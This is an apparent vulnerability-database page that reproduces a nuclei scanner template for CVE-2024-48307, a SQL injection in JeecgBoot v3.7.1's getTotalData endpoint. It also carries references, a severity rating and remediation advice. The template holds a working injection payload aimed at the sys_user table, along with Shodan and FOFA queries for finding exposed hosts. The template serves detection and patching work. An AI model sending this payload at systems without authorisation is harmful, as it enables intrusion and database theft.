Lucene search

K

JeecgBoot v3.7.1 - SQL Injection

🗓️ 09 Dec 2024 19:44:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

JeecgBoot v3.7.1 has a critical SQL Injection vulnerability via the getTotalData endpoint.

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
Veracode
SQL Injection
12 Nov 202405:14
veracode
CVE
CVE-2024-48307
31 Oct 202401:15
cve
Vulnrichment
CVE-2024-48307
31 Oct 202400:00
vulnrichment
OSV
JeecgBoot SQL Injection vulnerability
31 Oct 202403:30
osv
NVD
CVE-2024-48307
31 Oct 202401:15
nvd
Github Security Blog
JeecgBoot SQL Injection vulnerability
31 Oct 202403:30
github
Cvelist
CVE-2024-48307
31 Oct 202400:00
cvelist
id: CVE-2024-48307

info:
  name: JeecgBoot v3.7.1 - SQL Injection
  author: lbb,s4e-io
  severity: critical
  description: |
    The JeecgBoot application is vulnerable to SQL Injection via the `getTotalData` endpoint. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting SQL commands.
  remediation: |
    Validate and sanitize user inputs on the server side to prevent SQL injection attacks. Use prepared statements with parameterized queries instead of dynamic queries. Regularly update and patch the application to fix known vulnerabilities.
  reference:
    - https://github.com/wy876/POC/blob/main/JeecgBoot/JeecgBoot%E6%8E%A5%E5%8F%A3getTotalData%E5%AD%98%E5%9C%A8%E6%9C%AA%E6%8E%88%E6%9D%83SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2024-48307).md
    - https://github.com/jeecgboot/JeecgBoot/issues/7237
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-48307
    cwe-id: CWE-89
    epss-score: 0.00045
    epss-percentile: 0.17463
  metadata:
    max-request: 2
    vendor: jeecg
    product: jeecg_boot
    fofa-query:
      - icon_hash="-250963920"
      - icon_hash=1380908726
      - title="jeecg-boot"
    shodan-query: http.favicon.hash:"1380908726"
  tags: cve2024,cve,jeecg,sqli

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST {{path}}drag/onlDragDatasetHead/getTotalData HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(md5({{num}}),0x3a,0x3a)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}

    payloads:
      path:
        - /jeecg-boot/
        - /

    attack: batteringram
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "YzhjNjA1OTk5ZjNkODM1MmQ3YmI3OTJjZjNmZGIyNWI6Og==")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 490a0046304402205e6a3d5790483b0bdde032ed47c62a8c417e879b0898511f3099a2cb23166f1402207dcb78d5840d53b890f959a5d11ce8bf25d8515b6113b01fa0bddfb8591531af:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
09 Dec 2024 19:07Current
7.3High risk
Vulners AI Score7.3
CVSS39.8
SSVC
17
.json
Report